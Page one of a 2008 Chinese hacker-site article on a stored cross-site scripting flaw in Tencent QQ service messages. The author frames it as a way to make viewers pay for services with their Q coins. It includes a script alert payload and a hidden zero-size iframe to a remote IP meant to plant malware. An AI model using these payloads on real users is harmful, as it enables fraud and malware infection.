奥运倒计时: 2008 中国挺住,中国加油! 全国人民对四川汶川大地震遇难同胞的深切哀悼! 设为首页 加入收藏
点击进入太平洋安全网首页
论坛登陆 用户名: 密码:
首页 新闻资讯 文章中心 黑客资源 黑客点睛 安全防护 软件下载 动画教程 会员咨询 技术问答 论坛社区
文章 下载 图片
文章   | 电脑知识 | 网络知识 | 菜鸟入门 | 入侵教程 | 黑客攻防 | 黑客编程 | 原创精华 | 黑客人物 | 黑客技术 | 提权技术 | 跨站技术 | 渗透技术 | 鸽子专题 |
 您现在的位置: 太平洋安全网 >> 文章 >> 跨站技术 >> 正文

[图文]QQ业务跨站漏洞初步研究(图)

作者:Ink    文章来源:网络采集    点击数:    更新时间:2008-5-10
这阶段跨站闹的很凶..QQ也接连出了几个跨站漏洞..这不.QQ业务也出了跨站漏洞..经过测试
不论是QQ会员,黄钻贵族,QQ炫铃.等..都可以跨站..
这个漏洞也不是我发现的..是我的好友netshow告诉我的..听他说也是经过玄猫指点..所以在这里也要感谢玄猫

..又为我们带来了一经典之作..
具体危害和玄猫写过的一篇"QQ跨站漏洞巧利用强迫他人为你购买QQ秀"差不多..只是这个是用来购买腾讯服务

的...这个危害比那个还要大...如果你的QQ币足够支付的话.


首先我们来看一下这个漏洞.

首先进入
http://my.QQ.com/
打开业务列表..随便点个业务把..在"索要留言"里写代码:<script>alert('fhod');</script>
这时候对方QQ会出现系统提示..图1..

这里我们的留言很明显就被对方看到了..所以我们在留言的时候最好在前

面写一段话....然后后面在写<script>alert('fhod');</script>

然后对方查看的时候就会在浏览器上弹出一个内容为"fhod"的对话框.图2

那我们能不能利用它来做些什么呢?其实这个漏洞是完全可以让对方给你购买服务的..前提是只要对方查看了..

不过我对脚本不是很懂,.所以没做深入研究..我想只要把玄猫的那个看懂了..就可以举一反三..彻底的利用这

漏洞..

我简单说下我怎么做的把
测试的时候在留言处写<iframe>进行挂马是行不通的..我写了
<iframe src=http://218.xx.xx.xxx/kz.htm  width=0 height=0></iframe>

然后查看接受的代码就成了

                          <td>QQ炫铃服务费用:</td>
                          </tr>
                         <tr>
                          <td>预支付
                            <input type="text" name="textfield" size="2" maxlength="2"

class="border" value="1" onfocus="javascript:SetFee_give();">
                            个月,总金额为:<font color="#FF0000">
                            <input label name="total_fee" size="3"

maxlength="3" style="border:#ffffff 1px solid">Q币</td>
                        </tr>
                        <tr><td><font color="#0000FF">您可以修改预支付的

月数。</font></td></tr>
                      </table>
     

[1] [2] 下一页

文章录入:Ink    责任编辑:Ink 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     推荐文章
    固顶文章网络视频PPStream官方网站的跨站(图)
     热门文章
  • 此栏目下没有热点文章
  •  本站推荐

    关于我们 | 联系方法 | 招聘信息 | 加入会员 | 诚征代理 | 广告服务 | 欢迎投稿 | 站长信箱 | 友情链接 | 网站地图
    24小时客服:0374-7126138 技术支持:0374-7126138 投诉电话:0374-7967536
    客服QQ:883039 售后QQ:827520 技术QQ:78305152 投稿-商业:576880739
    Copyright 太平洋科技 2003-2007 版权所有 All Rights Reserved
    许可证号:豫ICP备07005385号